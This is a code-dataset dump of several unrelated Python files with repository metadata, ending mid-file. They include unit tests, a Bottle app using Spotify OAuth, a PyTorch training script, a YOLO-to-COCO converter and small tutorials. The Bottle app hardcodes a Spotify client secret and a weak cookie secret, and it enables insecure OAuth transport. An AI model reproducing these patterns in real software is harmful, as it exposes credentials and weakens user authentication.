\"Holberton\"\n bm.my_number = 98\n self.assertIn(\"name\", bm.to_dict())\n self.assertIn(\"my_number\", bm.to_dict())\n\n def test_to_dict_datetime_attributes_are_strs(self):\n bm = BaseModel()\n bm_dict = bm.to_dict()\n self.assertEqual(str, type(bm_dict[\"created_at\"]))\n self.assertEqual(str, type(bm_dict[\"updated_at\"]))\n\n def test_to_dict_output(self):\n dt = datetime.today()\n bm = BaseModel()\n bm.id = \"123456\"\n bm.created_at = bm.updated_at = dt\n tdict = {\n 'id': '123456',\n '__class__': 'BaseModel',\n 'created_at': dt.isoformat(),\n 'updated_at': dt.isoformat()\n }\n self.assertDictEqual(bm.to_dict(), tdict)\n\n def test_to_dict_with_arg(self):\n bm = BaseModel()\n with self.assertRaises(TypeError):\n bm.to_dict(None)\n\n def test_str_method(self):\n strn = f\"[BaseModel] ({self.base_model.id}) {self.base_model.__dict__}\"\n self.assertEqual(str(self.base_model), strn)\n\n @patch('models.base_model.storage')\n def test_init_with_kwargs(self, mock_storage):\n kwargs = {\n 'id': 'some_id',\n 'created_at': '2023-08-09T06:23:27.276770',\n 'updated_at': '2023-08-09T06:23:27.276770',\n 'name': 'My_Model',\n '__class__': 'BaseModel'\n }\n new_model = BaseModel(**kwargs)\n\n self.assertEqual(new_model.id, 'some_id')\n self.assertEqual(new_model.name, 'My_Model')\n\n def test_new_in_init(self):\n objects = storage.all()\n self.assertEqual(dict, type(objects))\n key = \"{}.{}\".format(\"BaseModel\", self.base_model.id)\n self.assertIn(key, objects)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Tgithinji/AirBnB_clone","sub_path":"tests/test_models/test_base_model.py","file_name":"test_base_model.py","file_ext":"py","file_size_in_byte":6511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"41185838912","text":"from django.conf.urls import url, include\n\nfrom ecommerce import views\nfrom pages.urls import custom_page_url\nfrom tests.ecommerce.views import (\n MockAddToCart, MockChangeCount, MockFlushCart, MockRemoveFromCart\n)\n\ntest_url = [\n url(r'^cart-add/$', MockAddToCart.as_view(), name='cart_add'),\n url(r'^cart-change/$', MockChangeCount.as_view(), name='cart_set_count'),\n url(r'^cart-flush/$', MockFlushCart.as_view(), name='cart_flush'),\n url(r'^cart-remove/$', MockRemoveFromCart.as_view(), name='cart_remove'),\n]\n\nurlpatterns = [\n url(r'^catalog/', include('catalog.urls')),\n url(r'^shop/', include(test_url)),\n custom_page_url(r'^shop/(?P<page>order)/$', views.OrderPage.as_view()),\n custom_page_url(r'^shop/(?P<page>order-success)/$', views.OrderSuccess.as_view()),\n]\n","repo_name":"fidals/refarm-site","sub_path":"tests/ecommerce/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"7273571125","text":"from bottle import Bottle, route, run, request, template, default_app, static_file, get, post, response, redirect \nimport requests\nfrom requests_oauthlib import OAuth2Session\nfrom oauthlib.oauth2 import TokenExpiredError\nfrom urlparse import parse_qs\nimport json\nimport os\n\nclient_id='d4be1938c2954285b3da4eb6ed81743c'\nclient_secret='f0c4c13ea86a4d98812a56a1b57c876b'\nredirect_uri = 'http://spotype-aitor28ld.rhcloud.com/callback'\nscope = ['playlist-modify-public', 'playlist-modify-private']\ntoken_url = \"https://accounts.spotify.com/api/token\"\n\n\ndef token_valido():\n token=request.get_cookie(\"token\", secret='some-secret-key')\n if token:\n 
token_ok = True\n try:\n oauth2 = OAuth2Session(client_id, token=token)\n r = oauth2.get('https://www.googleapis.com/oauth2/v1/userinfo')\n except TokenExpiredError as e:\n token_ok = False\n else:\n token_ok = False\n return token_ok\n\n@get('/login')\ndef LOGIN():\n if token_valido():\n redirect(\"/perfil\")\n else:\n response.set_cookie(\"token\", '',max_age=0)\n oauth2 = OAuth2Session(client_id, redirect_uri=redirect_uri,scope=scope)\n authorization_url, state = oauth2.authorization_url('https://accounts.spotify.com/authorize/')\n response.set_cookie(\"oauth_state\", state)\n redirect(authorization_url)\n\n@get('/callback')\ndef get_token():\n\n oauth2 = OAuth2Session(client_id, state=request.cookies.oauth_state,redirect_uri=redirect_uri)\n token = oauth2.fetch_token(token_url, client_secret=client_secret,authorization_response=request.url)\n response.set_cookie(\"token\", token,secret='some-secret-key')\n redirect(\"/perfil\")\n\n@get('/perfil')\ndef personal():\n\ttoken = request.get_cookie(\"token\", secret='some-secret-key')\n\ttokens = token[\"token_type\"]+\" \"+token[\"access_token\"]\n\theaders = {\"Accept\":\"aplication/json\",\"Authorization\":tokens}\n\tperfil = requests.get(\"https://api.spotify.com/v1/me\", headers=headers)\n\tif perfil.status_code == 200:\n\t\tcuenta = perfil.json()\n\t\t\n\treturn template('perfil.tpl', perfil=cuenta)\n\n@get('/formlista')\ndef formlista():\n\treturn template('lista.tpl')\n\n@post('/lista')\ndef lista():\n\tnombreid = request.forms.get('id')\n\tnombrepl = request.forms.get('name')\n\tpublica = request.forms.get('public')\n\ttoken = request.get_cookie(\"token\", secret='some-secret-key')\n\t#Crear la cookie del id y de la playlist\n\t#Cambiar y poner un checkbox al tipo de playlist\n\ttokens = token[\"token_type\"]+\" \"+token[\"access_token\"]\n\theaders = {\"Accept\":\"aplication/json\",\"Authorization\":tokens}\n\tdata = json.dumps({\"name\":nombrepl,\"public\":publica})\n\tlista = requests.post(\"https://api.spotify.com/v1/users/\"+str(nombreid)+\"/playlists\",headers=headers,data=data)\n\tif lista.status_code != 200:\n\t\tlis= lista.json()\n\t\tlistas=lis\n\t\t\n\t\treturn template('creador.tpl', listas=listas)\n\n@get('/addtracks/<name>/<playlist>')\ndef tracks(name,playlist):\n\tname = name\n\tplaylist = playlist\t\n\treturn template('addtracks.tpl',name = name,playlist = playlist)\n\n@get('/playlist/<name>/<play>')\ndef plays(name,play):\n\tname=name\n\tplay=play \n\treturn template('datos.tpl', name=name , play=play)\n\t\n@post('/final/<id>/<playli>')\ndef final(id,playli):\n\tname = id\n\tpl = playli\n\turi = request.forms.get('uri')\n\ttoken = request.get_cookie(\"token\", secret='some-secret-key')\n\ttokens = token[\"token_type\"]+\" \"+token[\"access_token\"]\n\theaders = {\"Accept\":\"aplication/json\",\"Authorization\":tokens}\n\tfin = requests.post(\"https://api.spotify.com/v1/users/\"+str(name)+\"/playlists/\"+str(pl)+\"/tracks?uris=\"+str(uri), headers=headers)\n\tif fin.status_code == 201:\n\t\tf = requests.get(\"https://api.spotify.com/v1/users/\"+str(name)+\"/playlists/\"+str(pl), headers=headers)\n\t\tif f.status_code == 200:\n\t\t\tfina = f.json()\n\t\n\t\treturn template('final.tpl', final=fina)\n\t\n@route('/')\ndef index():\n return template('index.tpl')\n\n@route('/search',method='POST')\ndef search():\n\tbuscador = request.forms.get('buscador')\n\topciones = request.forms.get('opciones')\n\tdatos={\"q\":buscador,\"type\":opciones}\n\tif opciones == \"artist\":\n\t\tartistas = 
requests.get(\"https://api.spotify.com/v1/search\", params=datos)\n\t\tif artistas.status_code == 200:\n\t\t\tartista=artistas.json()\n\t\t\tartis=artista[\"artists\"][\"items\"]\n\t\t\n\t\treturn template('artistas.tpl', artis=artis)\n\tif opciones == \"track\":\n\t\tcanciones = requests.get(\"https://api.spotify.com/v1/search\", params=datos)\n\t\tif canciones.status_code == 200:\n\t\t\tcancion = canciones.json()\n\t\n\t\treturn template(\"canciones.tpl\", canciones=cancion)\n\tif opciones == \"album\":\n\t\talbums = requests.get(\"https://api.spotify.com/v1/search\", params=datos)\n\t\tif albums.status_code == 200:\n\t\t\talbum = albums.json()\n\t\t\n\t\treturn template(\"albums.tpl\", album=album)\n\t\t\n\tif opciones == \"playlist\":\n\t\tlista = requests.get(\"https://api.spotify.com/v1/search\", params=datos)\n\t\tif lista.status_code == 200:\n\t\t\tplaylist = lista.json()\n\t\t\n\t\treturn template('playlist.tpl', playlist=playlist)\n\n\n@route('/static/<filepath:path>')\ndef server_static(filepath):\n return static_file(filepath, root='static')\n\n\n\n# This must be added in order to do correct path lookups for the views\nimport os\nfrom bottle import TEMPLATE_PATH\nos.environ['OAUTHLIB_INSECURE_TRANSPORT'] = '1'\nTEMPLATE_PATH.append(os.path.join(os.environ['OPENSHIFT_REPO_DIR'], 'wsgi/views/')) \n\napplication=default_app()\n","repo_name":"aitor28ld/Webplayer-con-spotify","sub_path":"wsgi/mybottleapp.py","file_name":"mybottleapp.py","file_ext":"py","file_size_in_byte":5227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"24510803164","text":"\"\"\"\r\npython3 train.py -p ../SSD/JR/Arcface_MS1MV3_R100_idemia_0_33/ -d 512 -g 0 -s k,k\r\n\r\nJean-Remy Conti\r\n2022\r\n\"\"\"\r\n\r\n\r\nimport argparse\r\nimport numpy as np\r\nimport torch\r\nfrom torch.utils.tensorboard import SummaryWriter\r\nimport os\r\nimport time\r\nimport datetime\r\nfrom tqdm import tqdm\r\nfrom pathlib import Path\r\n\r\nfrom utils.numpy_dataset import NumpyDataset\r\nfrom backbones import get_model\r\nfrom ethical_module import MLP, EthicalModule, FairModel\r\n\r\n\r\nparser = argparse.ArgumentParser(description='vMF training')\r\nparser.add_argument('-p', '--path_data', help='Path to numpy data folder', type=str)\r\nparser.add_argument('-d', '--dim', type=int, default=512, help='Feature space dimension') # 512 \r\nparser.add_argument('-s', '--scales', help='list of scale parameters', type=str)\r\nparser.add_argument('-n', '--network', default=None, help='Backbone network (r18, r34, r50, r100) of pre-trained model. 
'+\r\n\t\t\t\t\t\t\t\t\t\t\t\t' Set to None to avoid validation during training.', type=str)\r\nparser.add_argument('-g', '--gpu', default=0, type=int, help='GPU ids', nargs='+')\r\n\r\n\r\n#------------ Parameters ---------------#\r\n\r\nseed = 42 \r\n\r\nn_epochs = 50\r\nn_epochs_to_print = 1 # Number of epochs between each epoch loss print\r\nn_epochs_to_save = 2 # Number of epochs between each model checkpoint save\r\n\r\nlr = 0.01\r\nbatch_size = 1024\r\n\r\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\r\nprint('Device:', device)\r\n\r\n\r\ndef train(dataset, feat_dim = 512, kappas = 5.0, n_epochs = 200, lr = 0.01, seed = 42, batch_size = 32, device_ids= None):\r\n\t\"\"\"\r\n\tParameters\r\n\t----------\r\n\tdataset: NumpyDataset instance imported from numpy_dataset.\r\n\t\tdataset[input_idx] : tuple (embeddings[idx], torch.tensor(label[idx], gender[idx]))\r\n\t\tembeddings = dataset[:][0] \r\n\t\tembeddings[idx] = dataset[idx][0]\r\n\t\ttorch.tensor(label, gender) = dataset[:][1] || shape (n_points x 2)\r\n\t\tlabel = dataset[:][1][:,0]\r\n\t\tgender = dataset[:][1][:,1]\r\n\t\tlabel[idx] = dataset[idx][1][0]\r\n\t\tgender[idx] = dataset[idx][1][1]\r\n\tfeat_dim: int\r\n\tkappas: float or list of floats\r\n\t\tSee vmf_loss.py.\r\n\tn_epochs: int\r\n\tlr: float\r\n\tseed: int\r\n\t\tUsed to reproduce some random operations such as shuffling dataset.\r\n\tbatch_size: int\r\n\tdevice_ids: list\r\n\t\tList of GPU ids to use torch.nn.DataParallel.\r\n\t\tCan be None if only one device is used.\r\n\t\"\"\"\r\n\r\n\ttorch.manual_seed(seed)\r\n\r\n\tn_points = len(dataset)\r\n\tn_classes = torch.max(dataset[:][1][:,0]).item() + 1\r\n\tassert n_classes <= n_points, 'Please use more data points than centroids.'\r\n\t\r\n\t# Reduce list of concentration parameters\r\n\tif type(kappas) != list:\r\n\t\tkappas = [kappas]\r\n\tn_kappas = torch.unique( torch.FloatTensor(kappas) ).size(0)\r\n\r\n\t# Used to define vMF loss\r\n\tif n_kappas > 1:\r\n\t\t# Get the ordered set of unique labels alongside their corresponding genders\r\n\t\tlabels_set = dataset.get_labels_set().to(device)\r\n\telse:\r\n\t\tkappas = kappas[0]\r\n\t\tlabels_set=None\r\n\r\n\t# Display info of current model\r\n\tprint('#-------------- INFO --------------#')\r\n\tprint('Number of classes: ', n_classes)\r\n\tprint('Number of data points: ', n_points, '\\n')\r\n\tprint('Concentration parameters: ', kappas, '\\n')\r\n\tprint()\r\n\r\n\t# ------- Initialize training ------- # \r\n\ttrain_size = len(dataset)\r\n\ttrain_loader = torch.utils.data.DataLoader(dataset, batch_size= batch_size, shuffle=True)\r\n\t\r\n\t# Define model\r\n\td_in = dataset[0][0].size()[0]\r\n\th = 2 * d_in \t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\r\n\tmodel = MLP(d_in, h, feat_dim) # network transforming embeddings\r\n\tmodule = EthicalModule(model, n_classes, kappas, labels_set= labels_set)\r\n\tmodule.to(device)\r\n\tif type(device_ids) == list and len(device_ids) > 1:\r\n\t\tprint('multi-GPU')\r\n\t\t# multi-GPU setting\r\n\t\tmodule = torch.nn.DataParallel(module, device_ids = device_ids).to(device)\r\n\t\t# Save model architecture (but random weights)\r\n\t\ttorch.save(module.module.model, working_dir + 'model_dummy.pt')\r\n\telse:\r\n\t\ttorch.save(module.model, working_dir + 'model_dummy.pt')\r\n\r\n\toptimizer = torch.optim.Adam(module.parameters(), lr=lr)\r\n\t\r\n\ttrain_losses = []\r\n\tprint('#------------ TRAINING ------------#')\r\n\tn_iter = 1\r\n\tfor epoch in tqdm(range(n_epochs)):\r\n\r\n\t\t#------------ TRAINING 
------------#\r\n\t\tmodule.train()\r\n\t\t# Init loss of current epoch\r\n\t\ttrain_loss = 0.0\r\n\r\n\t\t# Batch process\r\n\t\tpbar = tqdm(total= train_size // batch_size) \r\n\t\tfor data, targets in train_loader:\r\n\r\n\t\t\tdata, targets = data.to(device), targets.to(device)\r\n\r\n\t\t\t# Forward\r\n\t\t\tloss, _ = module(data, forward = True, return_loss = True, labels = targets[:,0], get_features = False) \r\n\t\t\t# multi-GPU\r\n\t\t\tloss = loss.mean()\t\t\t\r\n\t\t\tassert np.isnan(loss.item()) == False, \"Loss is NaN !\"\r\n\r\n\t\t\t# Backward\r\n\t\t\toptimizer.zero_grad()\r\n\t\t\tloss.backward()\r\n\t\t\toptimizer.step()\r\n\r\n\t\t\t# Update loss of current epoch\r\n\t\t\ttrain_loss += loss.item() * float(len(data)) / float(train_size) \r\n\t\t\ttb.add_scalar('loss_batch', loss.item(), n_iter)\t\t\r\n\t\t\tpbar.update(1) \r\n\t\t\tn_iter += 1\r\n\t\tpbar.close() \r\n\t\ttrain_losses.append(train_loss)\t\r\n\r\n\t\ttb.add_scalar('loss', train_loss, epoch+1)\r\n\t\ttb.flush()\r\n\r\n\t\t# Print loss\r\n\t\tif (epoch+1) % n_epochs_to_print == 0 or (epoch == n_epochs -1):\r\n\t\t\tprint('Epoch [{}/{}], Train loss: {:.10f}' \r\n\t\t\t\t.format(epoch+1, n_epochs, train_loss))\r\n\r\n\t\t# Save model at each epoch \r\n\t\tif (epoch+1) % n_epochs_to_save == 0:\r\n\t\t\tif type(device_ids) == list and len(device_ids) > 1:\r\n\t\t\t\ttorch.save(module.module.model.state_dict(), working_dir + 'checkpoints/' + str(epoch+1) + '.pt' )\t\r\n\t\t\telse:\r\n\t\t\t\ttorch.save(module.model.state_dict(), working_dir + 'checkpoints/' + str(epoch+1) + '.pt' )\t\r\n\ttb.close()\r\n\r\n\t# Save entire model\r\n\tif type(device_ids) == list and len(device_ids) > 1:\r\n\t\ttorch.save(module.module.model, working_dir + 'model.pt')\r\n\telse:\r\n\t\ttorch.save(module.model, working_dir + 'model.pt')\r\n\tos.remove(working_dir + 'model_dummy.pt')\r\n\r\n\t# Save evolution of losses\r\n\tnp.save(working_dir + 'train_loss', np.array(train_losses))\r\n\r\n\t# Save hyperparameters to config file\r\n\tto_write = []\r\n\tto_write.append(str(datetime.datetime.now().strftime(\"%d/%m/%Y %H:%M\")) + '\\n\\n')\r\n\tto_write.append('Number of epochs: ' + str(epoch+1) + '\\n')\r\n\tto_write.append('Seed: ' + str(seed) + '\\n\\n')\r\n\r\n\tto_write.append('H: ' + str(h) + '\\n')\r\n\tto_write.append('Feature dimension: ' + str(feat_dim) + '\\n\\n')\r\n\r\n\tto_write.append('Learning Rate: ' + str(lr) + '\\n')\r\n\tto_write.append('Batch Size: ' + str(batch_size) + '\\n\\n')\r\n\r\n\tkappas_str = str(kappas)[1:-1] if str(kappas)[0] == '(' else str(kappas)\r\n\tto_write.append('Kappa : ' + kappas_str + '\\n\\n')\r\n\r\n\twith open(working_dir + 'config_training.txt', mode = 'w') as f_w:\r\n\t\t\tfor line in to_write:\r\n\t\t\t\tf_w.write(line)\r\n\r\n\tprint('------------------------------------\\n')\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\t\r\n\t# Take info\r\n\targs = parser.parse_args()\r\n\tprint(\"args\", args, '\\n')\r\n\r\n\t# Load dataset\r\n\tdataset = NumpyDataset(data_folder = args.path_data, root_img = None, gender = True)\r\n\r\n\t# Concentration parameters\r\n\tkappas = [float(item) for item in args.scales.split(',')]\r\n\tkappa_m = kappas[0]\r\n\tkappa_f = kappas[0] if len(kappas) == 1 else kappas[1]\r\n\r\n\t# Output training files destination (USED IN TRAIN FUNCTION)\r\n\tworking_dir = args.path_data + 'training/kappaM_' + str(int(kappa_m)) + '_kappaF_' + str(int(kappa_f)) + '/' \r\n\tPath(working_dir + 'checkpoints/').mkdir(parents= True, exist_ok= True)\r\n\t# Tensorboard\r\n\ttb = 
SummaryWriter(working_dir + 'logs')\r\n\r\n\t# Start training\r\n\tstart = time.time()\r\n\ttrain(dataset, feat_dim = args.dim, kappas = kappas, n_epochs = n_epochs, \r\n\t\t lr = lr, seed = seed, batch_size = batch_size, device_ids = args.gpu)\r\n\tend = time.time()\r\n\tprint('%.2f s' % (end-start))\r\n\r\n\r\n\r\n\r\n","repo_name":"JRConti/EthicalModule_vMF","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":7602,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"10855873650","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nZetCode PyQt5 tutorial\n\nIn this example, we select a color value\nfrom the QColorDialog and change the background\ncolor of a QFrame widget.\n\nAuthor: Jan Bodnar\nWebsite: zetcode.com\nLast edited: August 2017\n\"\"\"\nimport sys\nfrom PyQt5.QtWidgets import (QWidget,QPushButton,QFrame,\n QColorDialog,QApplication)\nfrom PyQt5.QtGui import QColor\n\nclass Example(QWidget):\n def __init__(self):\n super().__init__()\n\n self.initUI()\n# 例子里有一个按钮和一个QFrame,默认的背景颜色为黑色,我们可以使用QColorDialog改变背景颜色\n def initUI(self):\n # 初始化QtGui.QFrame的背景颜色。PyQt5.QtGui object\n col = QColor(255,255,255)# PyQt5.QtGUi.Qcolor对象(颜色已定)\n print(col)\n btn = QPushButton('Dialog',self)\n btn.move(20,20)\n # btn点击后产生事件connect槽showDialog\n btn.clicked.connect(self.showDialog)\n # 绑定一个框架属性fram,\n self.frm = QFrame(self)\n # 框架样式的固定格式背景颜色类似于HTML样式\n self.frm.setStyleSheet(\"QWidget { background-color:%s}\"\n % col.name())#col.name表示的是PyQt5.QtGUi.Qcolor对象的颜色6位十六进制表示#ffffff\n self.frm.setGeometry(130,22,100,100)\n \n self.setGeometry(300,300,250,180)\n self.setWindowTitle('Color dialog')\n self.show()\n \n\n def showDialog(self):\n # 将col重新指向颜色对话框并获取选定的颜色对象\n col = QColorDialog.getColor() # 返回一个PyQt5.QtGUi.Qcolor对象(颜色已定)\n print(col)\n print(col.isValid())\n if col.isValid():\n self.frm.setStyleSheet(\"QWidget { background-color:%s}\"\n % col.name())\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = Example()\n sys.exit(app.exec_())","repo_name":"klandhu/PyQt5learn","sub_path":"5.2Color_dialog_选取颜色.py","file_name":"5.2Color_dialog_选取颜色.py","file_ext":"py","file_size_in_byte":1984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"3406835941","text":"import os\nimport argparse\nimport cv2\nimport json\nimport time\nimport math\n\nfrom tqdm import tqdm\nfrom datetime import date\n\ndef get_args_parser():\n parser = argparse.ArgumentParser('Set conditions', add_help=False)\n parser.add_argument('--base_path', default='/hd/hyunsung/data/gov-thermal/test-20201126/total', type=str)\n parser.add_argument('--txt', default='train.txt', type=str)\n parser.add_argument('--data_path', default='obj_train_data', type=str)\n parser.add_argument('--output_path', default = 'output', type=str)\n parser.add_argument('--cls', default = 'obj.names', type=str)\n return parser\n\ndef main(args):\n base_path = args.base_path\n path_txt = os.path.join(base_path, args.txt)\n \n if not os.path.isdir(args.output_path):\n os.mkdir(args.output_path)\n if not os.path.isdir(os.path.join(args.output_path, 'images')):\n os.mkdir(os.path.join(args.output_path, 'images'))\n os.mkdir(os.path.join(args.output_path, 'annotations'))\n\n image_list = []\n annotation_list = []\n with open(path_txt, 'r') as f:\n while True:\n line = f.readline()\n if not line: break\n image_list.append(line[:-1])\n annotation_list.append(line[:-4]+'txt')\n\n label_json = {}\n 
label_json['info'] = {'description':'YOLO Dataset', 'url':None, 'version':None, 'contributor':'rauleun', 'date created':date.today().isoformat()}\n label_json['licenses'] = [{'url' : None, 'id':1, 'name':'github.com/rauleun/yolo2coco'}]\n label_json['images'] = []\n label_json['annotations'] = []\n \n img_count = 1\n annt_count = 1\n \n for image_path in tqdm(image_list):\n #time.sleep(0.1)\n json_img = {}\n json_img['license'] = 1\n json_img['file_name'] = image_path.split('/')[-1]\n json_img['coco_url'] = None\n img = cv2.imread(image_path)\n height, width, _ = img.shape \n json_img['height'] = height\n json_img['width'] = width\n json_img['date_captured'] = None\n json_img['flickr_url'] = None\n json_img['id'] = img_count\n label_json['images'].append(json_img)\n \n with open(os.path.join(base_path, args.data_path, image_path.split('/')[-1][:-3]+'txt')) as f_annt:\n while True:\n line_annt = f_annt.readline()\n if not line_annt: break\n\n annt_cls, annt_x, annt_y, annt_w, annt_h = line_annt.split()\n annt_x = width * float(annt_x)\n annt_w = width * float(annt_w)\n annt_y = height * float(annt_y)\n annt_h = height * float(annt_h)\n \n json_annt = {}\n json_annt['segmentation'] = None\n json_annt['area'] = annt_w * annt_h\n json_annt['iscrowd'] = 0 \n json_annt['image_id'] = img_count\n bbox = [annt_x - annt_w/2, annt_y-annt_h/2, annt_w, annt_h]\n if((bbox[0] < 0) or (bbox[1]<0)):\n bbox[0] = max(0, bbox[0])\n bbox[1] = max(0, bbox[1])\n bbox = [math.floor(bbox[0]), math.floor(bbox[1]), math.floor(bbox[2]), math.floor(bbox[3])]\n json_annt['bbox'] = bbox\n json_annt['category_id'] = annt_cls\n json_annt['id'] = annt_count\n label_json['annotations'].append(json_annt)\n annt_count += 1\n img_count += 1\n \n label_json['categories'] = []\n with open(os.path.join(base_path, args.cls)) as f_cls:\n cls_count = 0\n while True:\n line_cls = f_cls.readline()\n if not line_cls: break\n cls = line_cls[:-1]\n cls_annt = {}\n cls_annt['supercategory'] = cls\n cls_annt['id'] = cls_count\n cls_annt['name'] = cls\n label_json['categories'].append(cls_annt)\n cls_count += 1\n \n with open(os.path.join(args.output_path, 'annotations', 'label.json'), \"w+\") as json_file:\n json.dump(label_json, json_file, indent=4)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser('Conversion script', parents = [get_args_parser()])\n args = parser.parse_args()\n main(args)\n\n\n","repo_name":"rauleun/yolo2coco","sub_path":"yolo2coco.py","file_name":"yolo2coco.py","file_ext":"py","file_size_in_byte":4246,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"4098381140","text":"#!/usr/bin/python -t\n\n#time O(m*n) space O(1)\n\n#0,2 are \"dead\", and \"dead->live\"\n#1,3 are \"live\", and \"live->dead\"\n\nclass Solution(object):\n def gameOfLife(self, board):\n \"\"\"\n :type board: List[List[int]]\n :rtype: None Do not return anything, modify board in-place instead.\n \"\"\"\n m = len(board)\n n = len(board[0])\n for i in range(m):\n for j in range(n):\n if board[i][j] == 0 or board[i][j] == 2:\n if self.nnb(board, i, j) == 3:\n board[i][j] = 2\n else:\n if self.nnb(board, i, j) < 2 or self.nnb(board, i, j) > 3:\n board[i][j] = 3\n \n for i in range(m):\n for j in range(n):\n if board[i][j] == 2:\n board[i][j] = 1\n if board[i][j] == 3:\n board[i][j] = 0\n \n def nnb(self, board, i, j):\n m,n = len(board), len(board[0])\n count = 0\n if i-1 >= 0 and j-1 >= 0: count += board[i-1][j-1]%2\n if i-1 >= 0: count += board[i-1][j]%2\n if i-1 >= 0 and j+1 < 
n: count += board[i-1][j+1]%2\n if j-1 >= 0: count += board[i][j-1]%2\n if j+1 < n: count += board[i][j+1]%2\n if i+1 < m and j-1 >= 0: count += board[i+1][j-1]%2\n if i+1 < m: count += board[i+1][j]%2\n if i+1 < m and j+1 < n: count += board[i+1][j+1]%2\n return count\n","repo_name":"boknowswiki/mytraning","sub_path":"lc/python/289_game_of_life.py","file_name":"289_game_of_life.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"4291361667","text":"import json, io, os, struct, ast\n\n# Assembling data\nx = [1, 2, 3, 4, 5, 6, 7, 8]\ndata = {'a list': [u'€', u'輝', 1, 42, 3.141, 1337, 1.2345678e-13, 'help', True], #u'€'\n 'a string': 'bla',\n 'another dict': {'foo': 'bar',\n 'key': 'value',\n 'the answer': 42},\n 'David': x}\na_dict = {'new_key': 'new_value'}\ne_dict = {'x': [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12], \n 'y': [0, 2, 3, 5, 8, 12, 10, 13, 15, 17.9, 21, 25, 35]}\nf_dict = {'z': [1.2345678e37, -8.234567e-37, 1.234567e-13, 1.234567e-13, 1.234567e-13, 1.234567e-13, 1.234567e-13, 1.234567e-13]*1000}\n\ndata.update(a_dict)\ndata.update(e_dict)\n\nprint('\\nWe are now using data comprising of %s character(s):' %len(str(data)))\nprint(str(data))\n\ni = 5 # index of dict of a list\n# Use json to write txt file======================================================\nwith open('data.star', 'w') as txt_file:\n json.dump(data, txt_file) # dumps the dictionary as string format into memory\n# Read txt file with json\nwith open('data.star') as txt_file:\n txt_loaded = json.load(txt_file)\n\nprint('\\njson load TXT:')\nprint('same format after reloading? ', data == txt_loaded)\nprint(txt_loaded['a list'][i])\nprint('data.star: David:',txt_loaded['David'])\nans = txt_loaded['David'][0] + txt_loaded['David'][6]\nprint('1 + 7 = ', ans)\n\n# Use json to Write JSON=============================================================================\nwith io.open('data.json', 'w', encoding='utf8') as json_file:\n json_string = json.dumps(data, indent=4, sort_keys=True, separators=(',', ': '), ensure_ascii=False)\n json_file.write(json_string)\n# Read JSON file with json\nwith open('data.json') as json_file:\n json_loaded = json.load(json_file)\n\nprint('\\njson load proper-JSON:')\nprint('same format after reloading? ', data == json_loaded)\nprint(json_loaded['a list'][i])\nprint('data.json: David:', json_loaded['David'])\nans = json_loaded['David'][0] + json_loaded['David'][6]\nprint('1 + 7 = ', ans)\n\n# Use wb to write json-style data============================================================\nwith open('data.bin', 'wb') as bin_file:\n datastring = bytes(json.dumps(data), 'ascii') #Convert dict to string based on ascii\n bin_file.write(datastring)\nwith open('data.bin') as bin_file:\n bin_loaded = json.load(bin_file) #bin_file seems to be modified after being loaded\nwith open('data.bin','rb') as bin_file: #use rb to read as binary\n bin_read = bin_file.read()\n\nprint('\\njson load BIN:')\nprint('same format after reloading? ', data == bin_loaded)\nprint(bin_loaded['a list'][i])\nprint('data.bin: David:', bin_loaded['David'])\nans = bin_loaded['David'][0] + bin_loaded['David'][6]\nprint('1 + 7 = ', ans)\n\nprint('\\nDirect READ: bin_read (half of it): ', bin_read[:round(len(bin_read)/2)])\nprint('-> turned out to be just a string array!')\nprint('Converted to list:', str(bin_read).split(','))\nprint('\\ne.g. 
the first element:')\nprint(str(bin_read).split(',')[0], ' ...which is weird!!!')\n\n# Use UTF-8 encoding to build a file for <data>\ndatas = str(data)\nprint(\"\\nSerialized Data (Length: %s): %s\" %(len(datas), datas))\nwith open('data.utf', 'wb') as utfile:\n utfile.write(datas.encode('utf-8'))\n\n# Comparing FILESIZE of the same content using 3 different approaches:\nprint(\"\\nComparing FILESIZE:\")\nprint('data.star: ', os.path.getsize('data.star'), 'bytes (txt: no indent, no sort)')\nprint('data.json: ', os.path.getsize('data.json'), 'bytes (json style, indented, sorted)')\nprint('data.bin: ', os.path.getsize('data.bin'), 'bytes (identical to txt)')\nprint('(whose byte-length is %s)' %len(bin_read))\ndatautfsize = os.path.getsize('data.utf')\nprint('data.utf: ', datautfsize, 'bytes (utf-8 encoding)\\n')\n\n# Manipulating data representation=======================================================\n# mapping binary content of previous \"datastring\":\nprint(\"String representation of the Binary-Data (s-length: %s):\" %len(str(datastring)))\nprint(str(datastring))\nbin_groups = \" \".join(map(bin, datastring)) #convert bytes-array to spaced-binary-string\nprint(\"Bytes-array of Binary-Data (length: %s):\\n%s\" %(len(bin_groups.split(\" \")), bin_groups))\n# dict to binary: (in string representation)\ndatastring = json.dumps(data)\nprint(\"\\njson-dumps Data-String:\\n %s\" %datastring)\ndatabinary = ' '.join(format(ord(letter), 'b') for letter in datastring) #still a string displaying binary form\nprint('data in binary:\\n', databinary)\n# binary to dict: (in string representation)\njsn = ''.join(chr(int(x, 2)) for x in databinary.split(' '))\njsn = json.loads(jsn) # <class 'dict'>\nprint('\\nput back as dict: ', jsn)\n\n# Truncating and Appending to File's content:\nfrom os import SEEK_END\nfrom random import random as rd\nwith open('data.star', 'rb+') as star:\n steps = 2\n file_position = star.seek(-steps, 